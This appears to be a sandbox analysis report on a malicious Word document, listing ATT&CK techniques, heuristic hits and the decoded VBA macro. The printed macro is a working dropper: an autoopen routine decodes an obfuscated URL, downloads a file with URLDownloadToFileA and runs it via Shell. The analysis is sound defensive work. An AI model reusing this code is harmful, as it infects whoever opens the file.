MALICIOUS
338
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers the execution of obfuscated VBA code. This code utilizes the URLDownloadToFile API, indicating an attempt to download and execute a second-stage payload from a remote source. The presence of legacy WordBasic auto-exec markers and VBA macros, along with the ClamAV detection, strongly suggests malicious intent.
Heuristics 10
-
ClamAV: Doc.Exploit.Dropped-77 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Exploit.Dropped-77
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
j_W8 = Shell(R4_t, 1) -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
"URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
mog4O4d49 ZBGUQzMmnNQjLfJi("hot}tЂp.:\/R/'x*oimum6aF.1nneetf/cjlsP/]bki&nZ.Xewxdei"), Environ(ZBGUQzMmnNQjLfJi("T)M\P[")) & ZBGUQzMmnNQjLfJi("\zGfVlh\j(J_J7V3JtH^.…esxae|") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3320 bytes |
SHA-256: ea2bdcf64a078f83c4c0dab43f0ae2681e4e25d535c32a0e60c89e2a36539c88 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
41 of 74 identifiers look randomly generated (e.g. 'kuddPCeAMbIaLPqebUnk') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
jQ5
End Sub
Attribute VB_Name = "Module1"
Public Function ZBGUQzMmnNQjLfJi(MMzzbkwYsQ As String) As String
GoTo QmoxUCfvciBJyeaaZe
QmoxUCfvciBJyeaaZe:
GoTo OtTFVZcTsVAkgUp
OtTFVZcTsVAkgUp:
GoTo kuddPCeAMbIaLPqebUnk
kuddPCeAMbIaLPqebUnk:
GoTo BHDPSh
BHDPSh:
For NZNKEQTrblrn = 1 To Len(MMzzbkwYsQ) Step 2
GoTo YSwLeyRLBhqqpufYf
YSwLeyRLBhqqpufYf:
GoTo VmpskIYQAjlFinAKgthS
VmpskIYQAjlFinAKgthS:
GoTo PrZqcgGgsmEBYtRKGR
PrZqcgGgsmEBYtRKGR:
GoTo TGQojMOuOUcR
TGQojMOuOUcR:
GoTo HFKiovanmCFIAao
HFKiovanmCFIAao:
ZBGUQzMmnNQjLfJi = ZBGUQzMmnNQjLfJi & Mid(MMzzbkwYsQ, NZNKEQTrblrn, 1)
GoTo BVyDQNwJjjKS
BVyDQNwJjjKS:
GoTo cGfwQxICUDbKUbQ
cGfwQxICUDbKUbQ:
GoTo OVYhEzdfLRlti
OVYhEzdfLRlti:
GoTo JIMyELdDCSILDcFk
JIMyELdDCSILDcFk:
GoTo EZOFTeMMzzbkwYsQvN
EZOFTeMMzzbkwYsQvN:
GoTo KEQTrblrnzPQmoxUC
KEQTrblrnzPQmoxUC:
Next
GoTo iBJye
iBJye:
GoTo ZeOHO
ZeOHO:
GoTo FVZcTsVAkgUpgVkuddP
FVZcTsVAkgUpgVkuddP:
End Function
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "dfsdfsdf"
#If VBA7 Then
Private Declare PtrSafe Function GHJbkjJKG Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
ByVal gfhgfhF As String, _
ByVal hjkhgFF As String, _
ByVal gfhfghF As Long, _
ByVal gfdgdf As LongPtr) As LongPtr
#Else
Private Declare Function GHJbkjJKG Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
ByVal gfhgfhF As String, _
ByVal hjkhgFF As String, _
ByVal gfhfghF As Long, _
ByVal gfdgdf As Long) As Long
#End If
Public Function ZXVDwjtQQrzvB71() As Integer
Dim wFLdECQJIjCco17, aclHuKhrZdvFz71, ZGHsTHAroMpPX33, fjJHrRdaoktmZ65 As String
Dim fcBkLtHUPAViT23, mWaFlcfvpbGqs65, xjTEqCqYYumMA98, jHsPLZznaTPjl82 As Integer
fcBkLtHUPAViT23 = 6394
wFLdECQJIjCco17 = R
mWaFlcfvpbGqs65 = Asc(wFLdECQJIjCco17)
If fcBkLtHUPAViT23 > mWaFlcfvpbGqs65 Then
For xjTEqCqYYumMA98 = 1 To 54
jHsPLZznaTPjl82 = mWaFlcfvpbGqs65 + xjTEqCqYYumMA98
Next xjTEqCqYYumMA98
jHsPLZznaTPjl82 = jHsPLZznaTPjl82 + fcBkLtHUPAViT23
aclHuKhrZdvFz71 = CStr(jHsPLZznaTPjl82)
ZGHsTHAroMpPX33 = Mid$(aclHuKhrZdvFz71, 1, 4)
fjJHrRdaoktmZ65 = fjJHrRdaoktmZ65 & "25"
ZXVDwjtQQrzvB71 = CInt(Mid$(fjJHrRdaoktmZ65, 2, 6))
Else
ZXVDwjtQQrzvB71 = 54 + 6394
MsgBox ("dvuZGYOgDjMWl95")
End Function
Sub jQ5()
mog4O4d49 ZBGUQzMmnNQjLfJi("hot}tЂp.:\/R/'x*oimum6aF.1nneetf/cjlsP/]bki&nZ.Xewxdei"), Environ(ZBGUQzMmnNQjLfJi("T)M\P[")) & ZBGUQzMmnNQjLfJi("\zGfVlh\j(J_J7V3JtH^.…esxae|")
End Sub
Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean
vJHKBJdfkgfg = GHJbkjJKG(0&, Mh9_094suu, R4_t, 0&, 0&)
Dim j_W8
j_W8 = Shell(R4_t, 1)
End Function
Attribute VB_Name = "Module2"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.